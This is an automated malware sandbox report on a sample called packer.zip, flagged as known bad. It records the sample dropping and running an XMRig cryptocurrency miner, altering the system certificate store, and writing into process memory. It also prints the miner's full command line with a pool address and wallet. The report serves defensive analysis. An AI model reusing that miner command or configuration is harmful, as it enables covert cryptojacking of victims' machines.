Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 19:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:52
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4100 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4100 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2400-16-0x0000020519E50000-0x0000020519E70000-memory.dmp
memory/2400-17-0x000002051A0A0000-0x000002051A0C0000-memory.dmp
memory/2400-18-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-19-0x000002051B890000-0x000002051B8B0000-memory.dmp
memory/2400-20-0x000002051A0C0000-0x000002051A0E0000-memory.dmp
memory/2400-21-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-22-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-25-0x000002051A0C0000-0x000002051A0E0000-memory.dmp
memory/2400-24-0x000002051B890000-0x000002051B8B0000-memory.dmp
memory/2400-23-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-26-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-27-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-28-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-29-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-30-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-31-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-32-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-33-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-34-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-35-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-36-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-37-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-38-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-39-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-40-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-41-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-42-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-43-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-44-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-45-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-46-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-47-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-48-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-49-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-50-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-51-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-52-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-53-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-54-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-55-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-56-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-57-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-58-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-59-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-60-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-61-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-62-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-63-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-64-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-65-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-66-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-67-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-68-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-69-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-70-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-71-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-72-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-73-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-74-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-75-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-76-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-77-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-78-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-79-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-80-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-81-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-82-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-83-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
memory/2400-84-0x00007FF6379E0000-0x00007FF6384E3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
